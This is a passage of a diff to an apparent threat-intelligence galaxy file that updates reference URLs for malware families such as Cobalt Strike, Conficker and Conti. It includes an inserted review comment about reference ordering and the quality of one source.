+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://blog.group-ib.com/REvil_RaaS", + "https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718", + 
"https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/", + "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/", + "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", + "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728", + "https://www.macnica.net/file/mpression_automobile.pdf", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf", + "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", + "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", + "https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/", + "https://asec.ahnlab.com/ko/19860/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021", + "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64", + "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-148a", + "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", + "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", + "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", + 
"https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811", + "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153", + "https://connormcgarr.github.io/thread-hijacking/", + "https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/", + "https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups", + "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41", + "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/", + "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", + "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5", + "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", + "https://isc.sans.edu/diary/rss/27176", + "https://community.riskiq.com/article/c88cf7e6", + "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/542/original/CTIR_casestudy_2.pdf", + "https://community.riskiq.com/article/f0320980", + "https://www.youtube.com/watch?v=ysN-MqyIN7M", + "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", + "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html", + 
"https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf", + "https://twitter.com/GossiTheDog/status/1438500100238577670", + "https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", + "https://twitter.com/VK_Intel/status/1294320579311435776", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/", + "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f", + "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929", + "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9", + "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt", + "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://www.youtube.com/watch?v=gfYswA_Ronw", "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A", "https://blog.cobaltstrike.com/", - "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", - "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html", + "https://twitter.com/RedDrip7/status/1402640362972147717?s=20", + "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware", + "https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack", + 
"https://www.secureworks.com/research/threat-profiles/gold-waterfall", "https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b", - "https://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/", - "https://www.macnica.net/file/mpression_automobile.pdf", - "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", - "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", "https://www.youtube.com/watch?v=LA-XE5Jy2kU", - "https://mez0.cc/posts/cobaltstrike-powershell-exec/", - "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://thedfirreport.com/2020/10/08/ryuks-return/", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", - "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/", - "https://twitter.com/redcanary/status/1334224861628039169", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", - "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", - "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", - "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/", - "http://www.secureworks.com/research/threat-profiles/gold-kingswood", - 
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", "https://twitter.com/swisscom_csirt/status/1354052879158571008", "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-265a", "https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://connormcgarr.github.io/thread-hijacking/", - "https://paper.seebug.org/1301/", + "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728", + "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html", "https://web.br.de/interaktiv/ocean-lotus/en/", - "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/", - "https://redcanary.com/blog/getsystem-offsec/", + "https://twitter.com/alex_lanstein/status/1399829754887524354", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/", + "https://www.accenture.com/us-en/blogs/security/ransomware-hades", 
+ "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/", + "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20", + "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", + "https://blog.macnica.net/blog/2020/11/dtrack.html", + "https://blog.group-ib.com/colunmtk_apt41", + "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear", + "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/", + "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/", + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/", + "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/", + "https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ", + "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", + "https://401trg.com/burning-umbrella/ ", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", + "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", + "https://www.youtube.com/watch?v=6SDdUVejR2w", + "https://www.youtube.com/watch?v=y65hmcLIWDY", + "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2", + 
 "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/",
+ "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/",
+ "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/",
+ "https://www.malware-traffic-analysis.net/2021/09/17/index.html",
+ "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811",
+ "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/",
+ "https://isc.sans.edu/diary/rss/26862",
+ "https://twitter.com/elisalem9/status/1398566939656601606",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a",
+ "https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/",
+ "https://mez0.cc/posts/cobaltstrike-powershell-exec/",
+ "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations",
+ "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/",
+ "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach",
+ "https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/",
+ "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html",
+ "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf",
+ "https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
+ "https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a",
+ "https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/",
+ "https://twitter.com/redcanary/status/1334224861628039169",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734",
+ "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html",
+ "https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html",
+ "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/",
+ "https://isc.sans.edu/diary/27308",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e",
+ "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
+ "https://paper.seebug.org/1301/",
+ "https://netresec.com/?b=214d7ff",
+ "https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e",
 "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
- "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/",
+ "https://www.youtube.com/watch?v=borfuQGrB8g",
 "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.lac.co.jp/lacwatch/people/20180521_001638.html",
+ "https://www.istrosec.com/blog/apt-sk-cobalt/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos",
+ "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
+ "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/",
+ "https://twitter.com/ffforward/status/1324281530026524672",
+ "https://community.riskiq.com/article/0bcefe76",
+ "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
+ "https://michaelkoczwara.medium.com/cobalt-strike-powershell-payload-analysis-eecf74b3c2f7",
+ "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/",
+ "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
+ "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html",
+ "https://isc.sans.edu/diary/26752",
+ "https://twitter.com/TheDFIRReport/status/1356729371931860992",
+ "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/",
+ "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
+ "https://twitter.com/Cryptolaemus1/status/1407135648528711680",
+ "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
+ "https://redcanary.com/blog/grief-ransomware/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
+ "https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts",
+ "https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors",
+ "https://www.youtube.com/watch?v=GfbxHy6xnbA",
+ "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
+ "https://malwarelab.eu/posts/fin6-cobalt-strike/",
+ "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://twitter.com/AltShiftPrtScn/status/1403707430765273095",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/",
+ "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf",
+ "https://skyblue.team/posts/scanning-virustotal-firehose/",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf",
+ "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
+ "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "https://redcanary.com/blog/getsystem-offsec/",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/",
+ "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a",
+ "https://zero.bs/cobaltstrike-beacons-analyzed.html",
+ "https://github.com/Apr4h/CobaltStrikeScan",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/",
+ "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/",
+ "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/",
+ "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
+ "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.arashparsa.com/hook-heaps-and-live-free/",
+ "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
+ "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
+ "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/",
+ "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/",
+ "https://isc.sans.edu/diary/rss/27618",
+ "https://www.youtube.com/watch?v=WW0_TgWT2gs",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/",
+ "https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike#",
+ "https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/",
+ "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
+ "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf",
+ "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/",
+ "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
+ "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
+ "http://www.secureworks.com/research/threat-profiles/gold-winter",
+ "https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/",
+ "https://thedfirreport.com/2021/05/12/conti-ransomware/",
+ "https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e",
+ "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/",
+ "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
 "https://twitter.com/TheDFIRReport/status/1359669513520873473",
 "https://asec.ahnlab.com/ko/19640/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
- "https://www.lac.co.jp/lacwatch/people/20180521_001638.html",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
+ "https://www.cobaltstrike.com/support",
 "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos",
- "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html"
+ "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/"
 ],
 "synonyms": [
 "Agentemis",
@@ -11683,6 +13462,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat",
 "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html",
+ "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
 "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat"
 ],
 "synonyms": [],
@@ -11729,6 +13509,7 @@
 "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon",
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
 "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
 "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf"
 ],
@@ -11799,7 +13580,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldlock",
- "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html"
+ "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html",
+ "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5"
 ],
 "synonyms": [],
 "type": []
@@ -11918,7 +13700,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec",
- "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt"
+ "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -11994,9 +13777,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker",
- "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker",
 "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
+ "https://www.minitool.com/backup-tips/conficker-worm.html",
 "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html",
+ "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker",
 "https://github.com/tillmannw/cnfckr",
 "http://contagiodump.blogspot.com/2009/05/win32conficker.html"
 ],
@@ -12017,6 +13802,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius",
 "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/",
 "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat",
+ "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html",
 "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/"
 ],
 "synonyms": [],
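Review bot: The Kaspersky Kido/Conficker URL is removed at the top of this refs array and re-added three lines lower, so a pure reordering is recorded as a delete/add pair and the two genuinely new references (the archived BlackHat EU 2010 slides and the minitool.com article) are harder to pick out. The same churn appears in the Crimson hunk (seven URLs removed and re-added in new positions), the CyberGate hunk and the two DanaBot hunks, where the two welivesecurity URLs swap places across hunks. If this file is produced by a generator, emitting `refs` in a deterministic order (sorted, or upstream order preserved) would make regenerations diff as plain insertions. The minitool.com piece reads as a consumer backup-software article rather than an analysis; worth confirming it meets the bar for a reference.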
@@ -12026,39 +13812,76 @@
 "value": "Confucius"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti",
+ "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
+ "https://www.youtube.com/watch?v=hmaWy9QIC7c",
